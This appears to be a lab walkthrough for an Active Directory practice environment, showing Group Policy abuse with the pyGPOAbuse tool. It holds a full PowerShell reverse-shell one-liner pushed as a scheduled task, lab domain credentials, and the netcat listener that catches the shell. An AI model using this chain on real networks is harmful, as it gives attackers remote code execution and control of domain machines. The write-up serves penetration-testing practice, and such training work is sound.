# GPO abuse
* There is a GPO abuse on the north domain
* To abuse GPO we will use the project created by Hackndo : [pyGPOAbuse](https://github.com/Hackndo/pyGPOAbuse)
* The github readme file say : *“It will create an immediate scheduled task as SYSTEM on the remote computer for computer GPO, or as logged in user for user GPO.”*
```
git clone https://github.com/Hackndo/pyGPOAbuse.git
cd pyGPOAbuse
python3 -m pip install virtualenv
python3 -m virtualenv .venv
source .venv/bin/activate
python3 -m pip install -r requirements.txt
```
\
We get the id from bloodhound and launch the exploit with :
Now let’s try to get a powershell reverseshell
```
python3 pygpoabuse.py north.NewYork.local/miguel.cabrera:'ilovebaseball' -gpo-id "628D4237-8B4A-42C3-8599-66EB15352C43" -powershell -command "\$c = New-Object System.Net.Sockets.TCPClient('192.168.56.31',4444);\$s = \$c.GetStream();[byte[]]\$b = 0..65535|%{0};while((\$i = \$s.Read(\$b, 0, \$b.Length)) -ne 0){ \$d = (New-Object -TypeName System.Text.ASCIIEncoding).GetString(\$b,0, \$i); \$sb = (iex \$d 2>&1 | Out-String ); \$sb = ([text.encoding]::ASCII).GetBytes(\$sb + 'ps> '); \$s.Write(\$sb,0,\$sb.Length); \$s.Flush()};\$c.Close()" -taskname "MyTask" -description "You are done"
```
Catch the Shell - this needs to be done from the Lab Parrot OS VM.
```
nc -nlvp 4444
```
And a few moments later we get the powershell reverseshell
